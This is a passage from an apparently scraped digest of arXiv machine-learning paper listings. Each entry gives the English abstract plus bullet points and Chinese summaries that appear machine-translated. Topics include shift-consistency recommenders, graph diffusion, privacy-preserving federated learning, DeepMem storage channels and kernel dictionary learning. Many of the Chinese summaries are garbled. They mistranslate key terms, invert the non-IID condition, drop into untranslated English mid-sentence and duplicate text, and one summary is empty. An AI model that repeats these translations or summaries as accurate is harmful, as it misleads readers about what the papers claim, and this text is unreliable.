methods: proposes a new constraint called shift-consistency, and provides a rigorous mathematical description of the method
results: provably guarantees several key mathematical properties, including satisfaction of an admissibility criterion, fairness, and robustness

Abstract
In this paper, we propose a new constraint, called shift-consistency, for solving matrix/tensor completion problems in the context of recommender systems. Our method provably guarantees several key mathematical properties: (1) satisfies a recently established admissibility criterion for recommender systems; (2) satisfies a definition of fairness that eliminates a specific class of potential opportunities for users to maliciously influence system recommendations; and (3) offers robustness by exploiting provable uniqueness of missing-value imputation. We provide a rigorous mathematical description of the method, including its generalization from matrix to tensor form to permit representation and exploitation of complex structural relationships among sets of user and product attributes. We argue that our analysis suggests a structured means for defining latent-space projections that can permit provable performance properties to be established for machine learning methods.

摘要
在这篇论文中，我们提出了一个新的约束，称为偏移一致性，用于解决Matrix/Tensor completion问题在推荐系统中。我们的方法可以证明满足以下几个关键数学性质：（1）满足推荐系统中最近确立的适用性标准;（2）满足一种定义的公平性，以消除用户恶意影响推荐系统的可能性;（3）具有耐用性，通过利用缺失值填充的可证明唯一性来抗衡。我们提供了一个严格的数学描述，包括矩阵到多重形式的普遍化，以利用用户和产品特征之间的复杂结构关系。我们认为，我们的分析表明了一种结构化的方式，可以让 latent-space 投影具有可证明性能特性。

Autoregressive Diffusion Model for Graph Generation

paper_url: http://arxiv.org/abs/2307.08849
repo_url: None
paper_authors: Lingkai Kong, Jiaming Cui, Haotian Sun, Yuchen Zhuang, B. Aditya Prakash, Chao Zhang
for: 本文提出了一种束缚基于模型 для图形生成。
methods: 该模型使用自适应扩散过程，直接在零域图空间中操作。在前向扩散过程中，我们设计了一个数据依赖的节点吸引排序网络，用于学习图的排序。在反向生成过程中，我们设计了一个减噪网络，用于高效地重建图。
results: 我们在六种不同的通用图数据集和两种分子数据集上进行了实验，结果显示，我们的模型可以与之前的状态地图形成比或更好，同时具有快速的生成速度。

Abstract
Diffusion-based graph generative models have recently obtained promising results for graph generation. However, existing diffusion-based graph generative models are mostly one-shot generative models that apply Gaussian diffusion in the dequantized adjacency matrix space. Such a strategy can suffer from difficulty in model training, slow sampling speed, and incapability of incorporating constraints. We propose an \emph{autoregressive diffusion} model for graph generation. Unlike existing methods, we define a node-absorbing diffusion process that operates directly in the discrete graph space. For forward diffusion, we design a \emph{diffusion ordering network}, which learns a data-dependent node absorbing ordering from graph topology. For reverse generation, we design a \emph{denoising network} that uses the reverse node ordering to efficiently reconstruct the graph by predicting the node type of the new node and its edges with previously denoised nodes at a time. Based on the permutation invariance of graph, we show that the two networks can be jointly trained by optimizing a simple lower bound of data likelihood. Our experiments on six diverse generic graph datasets and two molecule datasets show that our model achieves better or comparable generation performance with previous state-of-the-art, and meanwhile enjoys fast generation speed.

摘要
Diffusion-based图生成模型在最近得到了优秀的结果，但现有的扩散基于的图生成模型多数是一次性的生成模型，它们在减量化的相对位图空间内应用扩散。这种策略可能会受到训练模型的困难，慢速的采样速度和约束的不具备。我们提出了一种“自适应扩散”模型，与现有方法不同，我们在离散图空间直接定义节点吸引扩散过程。对于前进扩散，我们设计了一个“扩散排序网络”，它学习从图ptopology得到数据依赖的节点吸引排序。对于逆生成，我们设计了一个“除噪网络”，它使用反向节点排序来高效地重建图， predicting the node type of the new node and its edges with previously denoised nodes at a time。基于图的幂等性，我们表明了这两个网络可以同时训练，通过优化数据可能性函数的简单下界来优化。我们在六种多样化的生成图据集和两个分子数据集上进行了实验，结果表明我们的模型可以与之前的状态时的性能相当或更好，同时具有快速的生成速度。

Privacy-preserving patient clustering for personalized federated learning

paper_url: http://arxiv.org/abs/2307.08847
repo_url: https://github.com/g2lab/pcfbl
paper_authors: Ahmed Elhussein, Gamze Gursoy
For: 这个研究旨在解决 Federated Learning (FL) 中 data 非同一性 Independent Distribution (non-IID) 问题，并提出 Privacy-preserving Community-Based Federated machine Learning (PCBFL) 框架，可以在不同医院中训练分组学习模型，并保护隐私。* Methods: PCBFL 使用 Secure Multiparty Computation (SMPC) 技术，可以安全地计算不同医院中病人的相似性分数，并使用 clustering 算法将病人分组。* Results: PCBFL 可以成功地将病人分组为低、中、高风险三种群体，并与传统和现有的 Clustered FL 框架进行比较，获得了平均 AUC 提升率4.3% 和 AUPRC 提升率7.8%。

Abstract
Federated Learning (FL) is a machine learning framework that enables multiple organizations to train a model without sharing their data with a central server. However, it experiences significant performance degradation if the data is non-identically independently distributed (non-IID). This is a problem in medical settings, where variations in the patient population contribute significantly to distribution differences across hospitals. Personalized FL addresses this issue by accounting for site-specific distribution differences. Clustered FL, a Personalized FL variant, was used to address this problem by clustering patients into groups across hospitals and training separate models on each group. However, privacy concerns remained as a challenge as the clustering process requires exchange of patient-level information. This was previously solved by forming clusters using aggregated data, which led to inaccurate groups and performance degradation. In this study, we propose Privacy-preserving Community-Based Federated machine Learning (PCBFL), a novel Clustered FL framework that can cluster patients using patient-level data while protecting privacy. PCBFL uses Secure Multiparty Computation, a cryptographic technique, to securely calculate patient-level similarity scores across hospitals. We then evaluate PCBFL by training a federated mortality prediction model using 20 sites from the eICU dataset. We compare the performance gain from PCBFL against traditional and existing Clustered FL frameworks. Our results show that PCBFL successfully forms clinically meaningful cohorts of low, medium, and high-risk patients. PCBFL outperforms traditional and existing Clustered FL frameworks with an average AUC improvement of 4.3% and AUPRC improvement of 7.8%.

摘要
federated learning (FL) 是一种机器学习框架，允许多个组织共同训练模型，无需将数据分享到中央服务器。然而，如果数据不是非 identical independently distributed (non-IID)，FL 会经受显著性能下降。这是医疗设置中的问题，Variations in the patient population contribute significantly to distribution differences across hospitals。personalized FL 解决了这个问题，通过考虑各地点特定的分布差异。clustered FL，一种个人化 FL 变体，使用 clustering 方法将患者分组，并在每个组上训练 separating 模型。然而，隐私问题仍然成为挑战，因为 clustering 过程需要交换患者级别信息。这已经解决了通过使用聚合数据来组成 clusters，但这会导致不准确的组和性能下降。在本研究中，我们提出了隐私保护的社区基于 Federated 机器学习 (PCBFL)，一种新的 clustering FL 框架，可以在患者级别数据上 clustering 患者，同时保护隐私。PCBFL 使用 Secure Multiparty Computation，一种密码学技术，以安全地计算各地点患者相似度分数。我们然后评估 PCBFL，通过在 20 个 eICU 数据集中训练一个联邦 Mortality 预测模型。我们比较 PCBFL 的性能与传统和现有的 clustering FL 框架。我们的结果表明，PCBFL 成功划分了低、中、高风险患者的临床意义full cohort。PCBFL 与传统和现有的 clustering FL 框架相比，平均 AUC 提高4.3%，AUPRC 提高7.8%。

Bayesian Safe Policy Learning with Chance Constrained Optimization: Application to Military Security Assessment during the Vietnam War

paper_url: http://arxiv.org/abs/2307.08840
repo_url: None
paper_authors: Zeyang Jia, Eli Ben-Michael, Kosuke Imai
For: The paper aims to improve a security assessment algorithm used during the Vietnam War by using outcomes measured immediately after its introduction in late 1969.* Methods: The paper introduces the Average Conditional Risk (ACRisk) to quantify the risk of worse outcomes for subgroups of individual units, and a Bayesian policy learning framework to maximize the posterior expected value while controlling the ACRisk.* Results: The learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors, compared to the actual algorithm used during the Vietnam War.Here are the three points in Simplified Chinese text:* For: 该文章目标是通过1969年底引入的出口来改进越南战争期间安全评估算法。* Methods: 该文章提出了 Conditional Risk (ACRisk) 来衡量各个单位 subgroup 的输出风险，以及 Bayesian 政策学习框架来控制 ACrisk 并最大化 posterior 期望值。* Results: 学习的算法认为大多数地区更安全，并且强调经济和政治因素比军事因素更重要，与实际使用的算法不同。

Abstract
Algorithmic and data-driven decisions and recommendations are commonly used in high-stakes decision-making settings such as criminal justice, medicine, and public policy. We investigate whether it would have been possible to improve a security assessment algorithm employed during the Vietnam War, using outcomes measured immediately after its introduction in late 1969. This empirical application raises several methodological challenges that frequently arise in high-stakes algorithmic decision-making. First, before implementing a new algorithm, it is essential to characterize and control the risk of yielding worse outcomes than the existing algorithm. Second, the existing algorithm is deterministic, and learning a new algorithm requires transparent extrapolation. Third, the existing algorithm involves discrete decision tables that are common but difficult to optimize over. To address these challenges, we introduce the Average Conditional Risk (ACRisk), which first quantifies the risk that a new algorithmic policy leads to worse outcomes for subgroups of individual units and then averages this over the distribution of subgroups. We also propose a Bayesian policy learning framework that maximizes the posterior expected value while controlling the posterior expected ACRisk. This framework separates the estimation of heterogeneous treatment effects from policy optimization, enabling flexible estimation of effects and optimization over complex policy classes. We characterize the resulting chance-constrained optimization problem as a constrained linear programming problem. Our analysis shows that compared to the actual algorithm used during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors.

摘要
高科技和数据驱动的决策和建议在高风险决策场景中广泛应用，如刑事司法、医疗和公共政策。我们调查了越南战争期间使用的安全评估算法是否可以改进，使用实际实施后的1969年底的结果。这种实践中出现了一些高风险算法决策中常见的方法学挑战。首先，在实施新算法之前，需要评估和控制新算法可能导致差化的风险。第二，现有的算法是 deterministic，需要透明地推断新算法。第三，现有的算法包含精确的决策表，这些表difficult to optimize。为了解决这些挑战，我们引入了 Conditional Risk (ACRisk)，它首先评估新算法政策对各个单位的 subgroup 的风险差化，然后平均这些风险。我们还提出了 Bayesian 政策学习框架，该框架在控制 posterior 预期值时最大化预期值，并且可以灵活地估计影响和优化复杂的政策类型。我们将这种机会constrained optimization问题 characterized as a linear programming problem。我们的分析表明，相比 actual algorithm 使用 during the Vietnam War, the learned algorithm assesses most regions as more secure and emphasizes economic and political factors over military factors。

A Meta-Learning Based Precoder Optimization Framework for Rate-Splitting Multiple Access

paper_url: http://arxiv.org/abs/2307.08822
repo_url: None
paper_authors: Rafael Cerna Loli, Bruno Clerckx
for: 提出一种基于元学习的RSMA前处理优化框架，直接在无法知道整个通道状态情况的情况下优化RSMA前处理器。
methods: 利用含义过拟合的卷积神经网络来最大化显式均值总bitrate表达式，从而绕过需要其他训练数据的限制。
results: 数值结果显示，元学习基于的解决方案在中等规模场景下与传统前处理优化相当，在大规模场景下明显超越低复杂度前处理算法。

Abstract
In this letter, we propose the use of a meta-learning based precoder optimization framework to directly optimize the Rate-Splitting Multiple Access (RSMA) precoders with partial Channel State Information at the Transmitter (CSIT). By exploiting the overfitting of the compact neural network to maximize the explicit Average Sum-Rate (ASR) expression, we effectively bypass the need for any other training data while minimizing the total running time. Numerical results reveal that the meta-learning based solution achieves similar ASR performance to conventional precoder optimization in medium-scale scenarios, and significantly outperforms sub-optimal low complexity precoder algorithms in the large-scale regime.

摘要
在这封信中，我们提议使用基于meta-学习的precoder优化框架来直接优化Rate-Splitting Multiple Access（RSMA）precoder，使用 transmitter （CSIT）中的部分通道状态信息。通过利用Compact Neural Network的过度适应来最大化显式Average Sum-Rate（ASR）表达，我们可以快速减少训练数据量，同时减少总耗时。 numerically 的结果表明，基于meta-学习的解决方案在中型情景下与传统precoder优化相似的ASR性能，而在大规模情景下明显超过低复杂度precoder算法。Here's the translation of the text into Traditional Chinese:在这封信中，我们提议使用基于meta-学习的precoder优化框架来直接优化Rate-Splitting Multiple Access（RSMA）precoder，使用传递器（CSIT）中的部分通道状态信息。通过利用Compact Neural Network的过度适应来最大化显式Average Sum-Rate（ASR）表达，我们可以快速减少训练数据量，同时减少总耗时。numerically 的结果显示，基于meta-学习的解决方案在中型情景下与传统precoder优化相似的ASR性能，而在大规模情景下明显超过低复杂度precoder算法。

Towards Accelerating Benders Decomposition via Reinforcement Learning Surrogate Models

paper_url: http://arxiv.org/abs/2307.08816
repo_url: None
paper_authors: Stephen Mak, Kyle Mana, Parisa Zehtabi, Michael Cashmore, Daniele Magazzeni, Manuela Veloso
for: 这篇论文是为了提出一种快速化Benders decomposition（BD）方法，以解决受不确定性影响的数值优化问题。
methods: 本论文使用的方法是BD方法，并利用一个代理模型来取代NP困难的整数主问题，以加速BD方法的执行。
results: 在实验中，这种加速BD方法可以让解决随机存储管理问题的时间提高30%，比其他加速BD实现方法更快。

Abstract
Stochastic optimization (SO) attempts to offer optimal decisions in the presence of uncertainty. Often, the classical formulation of these problems becomes intractable due to (a) the number of scenarios required to capture the uncertainty and (b) the discrete nature of real-world planning problems. To overcome these tractability issues, practitioners turn to decomposition methods that divide the problem into smaller, more tractable sub-problems. The focal decomposition method of this paper is Benders decomposition (BD), which decomposes stochastic optimization problems on the basis of scenario independence. In this paper we propose a method of accelerating BD with the aid of a surrogate model in place of an NP-hard integer master problem. Through the acceleration method we observe 30% faster average convergence when compared to other accelerated BD implementations. We introduce a reinforcement learning agent as a surrogate and demonstrate how it can be used to solve a stochastic inventory management problem.

摘要
In this paper, we propose a method for accelerating Benders decomposition (BD), a popular decomposition method for stochastic optimization problems, using a surrogate model in place of the NP-hard integer master problem. Our method leverages a reinforcement learning agent as the surrogate and demonstrates its effectiveness in solving a stochastic inventory management problem. We observe an average convergence rate 30% faster than other accelerated BD implementations.Here is the text in Simplified Chinese: Stochastic optimization (SO) 尝试提供在不确定环境中的优化决策。然而， classical 的问题表述方式可能会变得不可求解，因为需要大量的enario来捕捉不确定性，以及实际规划问题的精度问题。为了解决这些 tractability 问题，专家们经常使用分解方法，将问题分解成更加可控的子问题。在这篇论文中，我们提出了使用代理模型加速 Benders 分解（BD）的方法。我们使用 reinforcement learning 代理来解决一个不确定存储管理问题。我们观察到，使用这种加速方法可以比其他加速BD实现的平均速度提高30%。

Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge

paper_url: http://arxiv.org/abs/2307.08813
repo_url: https://github.com/boxorange/bioie-llm
paper_authors: Gilchan Park, Byung-Jun Yoon, Xihaier Luo, Vanessa López-Marrero, Patrick Johnstone, Shinjae Yoo, Francis J. Alexander
for: 这项研究的目的是使用大型自然语言模型来自动从科学文献中提取蛋白质相互作用、蛋白质通路和基因调控关系的知识。
methods: 本研究使用了不同的大型自然语言模型来完成蛋白质相互作用、蛋白质通路和基因调控关系的识别任务。
results: 研究发现了不同的大型自然语言模型在完成这些任务时的效果，并提供了一些显著的发现和未来的机会，以及仍然存在的挑战。In English, it means:
for: The goal of this study is to use large language models to automatically extract knowledge of protein interactions, pathways, and gene regulatory relations from scientific literature.
methods: The study uses different large language models to complete tasks of recognizing protein interactions, pathways, and gene regulatory relations.
results: The study finds the effectiveness of different language models in completing these tasks, provides significant findings, and discusses future opportunities and remaining challenges.

Abstract
Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM

摘要
理解蛋白交互和生物路径知识是生物系统复杂性的关键，帮助我们探索生物功能和复杂疾病的基础机理。现有数据库提供了文献和其他来源中的生物数据，但这些数据库经常受到不完整性和维护劳动的限制，需要新的方法。在本研究中，我们利用大型自然语言模型来解决这些问题，自动从相关的科学文献中提取生物知识。为达到这个目标，我们在这篇论文中评估了不同的大型自然语言模型在蛋白交互、生物路径和蛋白质调控关系的识别任务中的效果。我们仔细评估了各模型的表现，披露了重要的发现，并讨论了这种方法的未来机会和仍然存在的挑战。代码和数据可以在 GitHub 上获取：。

DeepMem: ML Models as storage channels and their (mis-)applications

paper_url: http://arxiv.org/abs/2307.08811
repo_url: None
paper_authors: Md Abdullah Al Mamun, Quazi Mishkatul Alam, Erfan Shaigani, Pedram Zaree, Ihsen Alouani, Nael Abu-Ghazaleh
for: 本文提出了一种新的信息理论视角，视 ML 模型为一个存储通道，并研究了在这个存储通道上进行隐藏信息的存储和检测。
methods: 作者使用了一种黑盒访问方式，通过在训练时嵌入隐藏信息，并在部署后使用黑盒访问来检测和提取隐藏信息。
results: 作者分析了存储 primitives 和检测 primitives，并提出了一种基于 ML 特有的替换基于错误 correction 协议来提高存储 primitives 的可靠性。

Abstract
Machine learning (ML) models are overparameterized to support generality and avoid overfitting. Prior works have shown that these additional parameters can be used for both malicious (e.g., hiding a model covertly within a trained model) and beneficial purposes (e.g., watermarking a model). In this paper, we propose a novel information theoretic perspective of the problem; we consider the ML model as a storage channel with a capacity that increases with overparameterization. Specifically, we consider a sender that embeds arbitrary information in the model at training time, which can be extracted by a receiver with a black-box access to the deployed model. We derive an upper bound on the capacity of the channel based on the number of available parameters. We then explore black-box write and read primitives that allow the attacker to: (i) store data in an optimized way within the model by augmenting the training data at the transmitter side, and (ii) to read it by querying the model after it is deployed. We also analyze the detectability of the writing primitive and consider a new version of the problem which takes information storage covertness into account. Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.

摘要
Translated into Simplified Chinese:机器学习（ML）模型通常过过参数化来支持通用性和避免过拟合。先前的研究表明，这些额外参数可以用于both malicious（如隐藏一个模型在训练过程中）和有益目的（如模型水印）。在这篇论文中，我们提出了一种新的信息理论视角，视ML模型为一个存储通道，其容量随参数的增加而增加。 Specifically，我们考虑一个发送者在训练时将自定义信息嵌入模型中，并且通过黑盒访问已部署模型来提取这些信息。我们得出了参数的容量的上限，并explore黑盒写和读 primitives，allowing the attacker to: (i) 在发送方 сторо面优化数据，以便在部署后通过模型进行读取，和 (ii) 通过访问部署后的模型来读取数据。我们还分析了写 primitives的检测性，并考虑了一个新的问题，即存储隐蔽性。 Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.Translated into Traditional Chinese:机器学习（ML）模型通常过过参数化来支持通用性和避免过拟合。先前的研究表明，这些额外参数可以用于both malicious（如隐藏一个模型在训练过程中）和有益目的（如模型水印）。在这篇论文中，我们提出了一个新的信息理论角度，视ML模型为一个存储通道，其容量随参数的增加而增加。 Specifically，我们考虑一个发送者在训练时将自定义信息嵌入模型中，并且透过黑盒访问已部署模型来提取这些信息。我们得出了参数的容量的上限，并explore黑盒写和读 primitives，allowing the attacker to: (i) 在发送方 сторо面优化数据，以便在部署后通过模型进行读取，和 (ii) 通过访问部署后的模型来读取数据。我们还分析了写 primitives的检测性，并考虑了一个新的问题，即存储隐蔽性。 Specifically, to obtain storage covertness, we introduce a new constraint such that the data augmentation used for the write primitives minimizes the distribution shift with the initial (baseline task) distribution. This constraint introduces a level of "interference" with the initial task, thereby limiting the channel's effective capacity. Therefore, we develop optimizations to improve the capacity in this case, including a novel ML-specific substitution based error correction protocol. We believe that the proposed modeling of the problem offers new tools to better understand and mitigate potential vulnerabilities of ML, especially in the context of increasingly large models.

Operator Guidance Informed by AI-Augmented Simulations

paper_url: http://arxiv.org/abs/2307.08810
repo_url: None
paper_authors: Samuel J. Edwards, Michael Levine
for: 这个论文是为了计算船舶响应统计数据的多优化、数据适应方法。
methods: 这个论文使用了Long Short-Term Memory（LSTM）神经网络，以及一个快速低精度的计算工具SimpleCode，以及一个更高精度的计算工具Large Amplitude Motion Program（LAMP）。
results: 研究发现，使用LSTM神经网络可以准确地估计船舶响应统计数据，并且可以在不同的海洋条件下提供高精度的结果。

Abstract
This paper will present a multi-fidelity, data-adaptive approach with a Long Short-Term Memory (LSTM) neural network to estimate ship response statistics in bimodal, bidirectional seas. The study will employ a fast low-fidelity, volume-based tool SimpleCode and a higher-fidelity tool known as the Large Amplitude Motion Program (LAMP). SimpleCode and LAMP data were generated by common bi-modal, bi-directional sea conditions in the North Atlantic as training data. After training an LSTM network with LAMP ship motion response data, a sample route was traversed and randomly sampled historical weather was input into SimpleCode and the LSTM network, and compared against the higher fidelity results.

摘要
这篇论文将介绍一种多模精度、数据适应的方法，使用长期快速响应（LSTM）神经网络来估算船舶响应统计在双模态、双向海域中。这项研究将使用快速低精度的SimpleCode工具和高精度的Large Amplitude Motion Program（LAMP）工具。SimpleCode和LAMP数据都是通过共同的双模态、双向海域条件在北大西洋中生成的训练数据。 после训练LSTM网络使用LAMP船舶运动数据，一个示例路线被跨越，并将SimpleCode和LSTM网络输入历史气象数据，并与更高精度结果进行比较。

Local or Global: Selective Knowledge Assimilation for Federated Learning with Limited Labels

paper_url: http://arxiv.org/abs/2307.08809
repo_url: None
paper_authors: Yae Jee Cho, Gauri Joshi, Dimitrios Dimitriadis
for: 提高 federated learning 的效果，尤其是在 client 有限的标签数据的情况下。
methods: 提出 FedLabel 方法，使 client 可以选择本地或全局模型来pseudo-标签未标签数据，并通过全局-本地一致常量正则化来利用两个模型的知识。
results: 在 cross-device 和 cross-silo Setting 中，FedLabel 比其他 semi-supervised FL 基线方法提高 $8$-$24%$，甚至超过了标准全部标签 FL 基线($100%$ 标签数据)，只使用 $5$-$20%$ 的标签数据。

Abstract
Many existing FL methods assume clients with fully-labeled data, while in realistic settings, clients have limited labels due to the expensive and laborious process of labeling. Limited labeled local data of the clients often leads to their local model having poor generalization abilities to their larger unlabeled local data, such as having class-distribution mismatch with the unlabeled data. As a result, clients may instead look to benefit from the global model trained across clients to leverage their unlabeled data, but this also becomes difficult due to data heterogeneity across clients. In our work, we propose FedLabel where clients selectively choose the local or global model to pseudo-label their unlabeled data depending on which is more of an expert of the data. We further utilize both the local and global models' knowledge via global-local consistency regularization which minimizes the divergence between the two models' outputs when they have identical pseudo-labels for the unlabeled data. Unlike other semi-supervised FL baselines, our method does not require additional experts other than the local or global model, nor require additional parameters to be communicated. We also do not assume any server-labeled data or fully labeled clients. For both cross-device and cross-silo settings, we show that FedLabel outperforms other semi-supervised FL baselines by $8$-$24\%$, and even outperforms standard fully supervised FL baselines ($100\%$ labeled data) with only $5$-$20\%$ of labeled data.

摘要

Anomaly Detection with Selective Dictionary Learning

paper_url: http://arxiv.org/abs/2307.08807
repo_url: https://github.com/denisilie94/pyod-dl
paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
for: 本研究提出了基于词典学习（DL）和核心词典学习（KDL）的新型异常检测方法。
methods: 本研究使用了已知的DL和KDL算法，并将其改进为无监督的异常检测方法。此外，我们还提出了一种减少kernel版本（RKDL），用于解决大数据集问题。
results: 我们的算法在一个异常检测工具箱中引入，并与标准 referéncé результаты进行比较。

Abstract
In this paper we present new methods of anomaly detection based on Dictionary Learning (DL) and Kernel Dictionary Learning (KDL). The main contribution consists in the adaption of known DL and KDL algorithms in the form of unsupervised methods, used for outlier detection. We propose a reduced kernel version (RKDL), which is useful for problems with large data sets, due to the large kernel matrix. We also improve the DL and RKDL methods by the use of a random selection of signals, which aims to eliminate the outliers from the training procedure. All our algorithms are introduced in an anomaly detection toolbox and are compared to standard benchmark results.

摘要
在这篇论文中，我们提出了基于字典学习（DL）和核函数字典学习（KDL）的新方法，用于异常检测。我们的主要贡献在于将知名的DL和KDL算法改进为无监督的方法，用于异常检测。我们还提出了一种减小核kernel版本（RKDL），适用于具有大数据集的问题，因为大 kernel 矩阵。此外，我们还使用随机选择的信号，以消除异常从训练过程中。我们的所有算法都是在异常检测工具箱中引入，并与标准 Referenz结果进行比较。Note: Please note that the translation is in Simplified Chinese, which is one of the two standard versions of Chinese. If you prefer Traditional Chinese, please let me know and I can provide the translation in that version as well.

Towards Automated Design of Riboswitches

paper_url: http://arxiv.org/abs/2307.08801
repo_url: None
paper_authors: Frederic Runge, Jörg K. H. Franke, Frank Hutter
for: 本研究旨在开发一种新的计算方法，用于降低扩ycz的筛选和选择成本，以提高核酸扩ycz的发现效率。
methods: 本研究使用了一种新的结构基于的设计方法，考虑了全球性和愿望的序列和结构特征。
results: 研究人员通过使用libLEARNA方法，成功地设计了茶苷核酸扩ycz库，包含30%更多的高质量独特候选者。

Abstract
Experimental screening and selection pipelines for the discovery of novel riboswitches are expensive, time-consuming, and inefficient. Using computational methods to reduce the number of candidates for the screen could drastically decrease these costs. However, existing computational approaches do not fully satisfy all requirements for the design of such initial screening libraries. In this work, we present a new method, libLEARNA, capable of providing RNA focus libraries of diverse variable-length qualified candidates. Our novel structure-based design approach considers global properties as well as desired sequence and structure features. We demonstrate the benefits of our method by designing theophylline riboswitch libraries, following a previously published protocol, and yielding 30% more unique high-quality candidates.

摘要
现有的实验室检测和选择管道可能会带来高额的成本和时间开销，同时效率也不高。使用计算机方法来减少层次的候选人选择可能会带来极大的成本降低。然而，现有的计算方法并不完全满足初步层次检测图书馆的设计需求。在这个工作中，我们提出了一种新的方法，libLEARNA，可以提供多样化变长资格候选人库。我们的新的结构基于设计方法考虑了全局特性以及愿望的序列和结构特征。我们示出了我们的方法的优势，通过采用已发表的卡夫曼协议，设计了茶苷核酸抑制 riboswitch库，并且获得了30%更多的独特高质量候选人。

regulAS: A Bioinformatics Tool for the Integrative Analysis of Alternative Splicing Regulome using RNA-Seq data

paper_url: http://arxiv.org/abs/2307.08800
repo_url: https://github.com/slipnitskaya/regulas
paper_authors: Sofya Lipnitskaya
for: regulAS is designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations in cancer and healthy human donors.
methods: regulAS uses integrative analysis of large-scale RNA-Seq data from TCGA and GTEx projects, with features such as RNA-Seq data retrieval, predictive modeling, and flexible reporting.
results: regulAS provides automated solutions for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, with the extensibility to tailor the software to specific research needs.Here’s the same information in Simplified Chinese:
for: regulAS 是为 computation biology 研究人员提供一个支持工具，用于调查转录调节变化的规则机制，以及人体和癌症样本中的转录调节。
methods: regulAS 使用了大规模 RNA-Seq 数据，包括 TCGA 和 GTEx 项目，并提供了一些功能，如 RNA-Seq 数据检索、预测模型和灵活报告生成。
results: regulAS 提供了一个自动化的解决方案，用于研究转录调节和癌症生物学，提高了效率、可重复性和自定义实验设计的能力，同时允许研究人员根据自己的需求进行特定的自定义和扩展。

Abstract
The regulAS software package is a bioinformatics tool designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations through integrative analysis of large-scale RNA-Seq data from cancer and healthy human donors, characterized by TCGA and GTEx projects. This technical report provides a comprehensive overview of regulAS, focusing on its core functionality, basic modules, experiment configuration, further extensibility and customisation. The core functionality of regulAS enables the automation of computational experiments, efficient results storage and processing, and streamlined workflow management. Integrated basic modules extend regulAS with features such as RNA-Seq data retrieval from the public multi-omics UCSC Xena data repository, predictive modeling and feature ranking capabilities using the scikit-learn package, and flexible reporting generation for analysing gene expression profiles and relevant modulations of alternative splicing aberrations across tissues and cancer types. Experiment configuration is handled through YAML files with the Hydra and OmegaConf libraries, offering a user-friendly approach. Additionally, regulAS allows for the development and integration of custom modules to handle specialized tasks. In conclusion, regulAS provides an automated solution for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, while the extensibility of the pipeline enables researchers to further tailor the software package to their specific needs. Source code is available under the MIT license at https://github.com/slipnitskaya/regulAS.

摘要
regulAS 软件包是一款 bioinformatics 工具，用于支持生物计算研究人员在 investigate 蛋白水平修饰的调控机制方面进行集成分析大规模 RNA-Seq 数据。这份技术报告提供了 regulAS 的全面介绍，重点介绍其核心功能、基本模块、实验配置、进一步扩展和自定义。regulAS 的核心功能包括自动化计算实验、高效存储和处理结果，以及流程管理。 integrate 的基本模块包括从公共多元素 UCSC Xena 数据存储库中获取 RNA-Seq 数据、使用 scikit-learn 包进行预测模型和特征排名，以及自定义报告生成分析蛋白表达资料和相关的修饰异常现象 across 组织和癌种。实验配置通过 YAML 文件与 Hydra 和 OmegaConf 库进行处理，提供了一种用户友好的方法。此外，regulAS 还允许开发和集成特殊任务的自定义模块。总之，regulAS 提供了一个自动化的蛋白水平修饰和癌生物学研究的解决方案，提高了效率、可重复性和实验设计的自定义能力，同时 pipeline 的可扩展性允许研究人员根据自己的具体需求进行进一步的定制。源代码可以在获取，采用 MIT 许可证。

Reduced Kernel Dictionary Learning

paper_url: http://arxiv.org/abs/2307.08798
repo_url: https://github.com/denisilie94/rkdl
paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
for: 这篇论文是为了解决大量数据集时，常见的问题：核心矩阵的大小。
methods: 本文提出了一种新的方法，即使用训练精简表示法来生成减少大小的非线性表示。具体来说，我们使用梯度下降步骤来优化核kernel向量。
results: 我们通过三个数据集的实验显示，我们的方法可以提供更好的表示，即使使用一小数量的核kernel向量，同时也可以降低执行时间。

Abstract
In this paper we present new algorithms for training reduced-size nonlinear representations in the Kernel Dictionary Learning (KDL) problem. Standard KDL has the drawback of a large size of the kernel matrix when the data set is large. There are several ways of reducing the kernel size, notably Nystr\"om sampling. We propose here a method more in the spirit of dictionary learning, where the kernel vectors are obtained with a trained sparse representation of the input signals. Moreover, we optimize directly the kernel vectors in the KDL process, using gradient descent steps. We show with three data sets that our algorithms are able to provide better representations, despite using a small number of kernel vectors, and also decrease the execution time with respect to KDL.

摘要
在这篇论文中，我们提出了新的算法用于在kernel Dictionary Learning（KDL）问题中训练减小非线性表示。标准KDL在数据集大时具有大kernel矩阵的缺点。有几种减小kernel大小的方法，其中一种是Nystr\"om sampling。我们在这里提出了一种更接近字典学习的方法，其中kernel вектор通过输入信号的训练稀缺表示获得。此外，我们直接在KDL过程中优化kernel вектор，使用梯度下降步骤。我们通过三个数据集的实验表明，我们的算法能够提供更好的表示，即使使用少量kernel вектор，同时也降低了与KDL的执行时间。

Classification with Incoherent Kernel Dictionary Learning

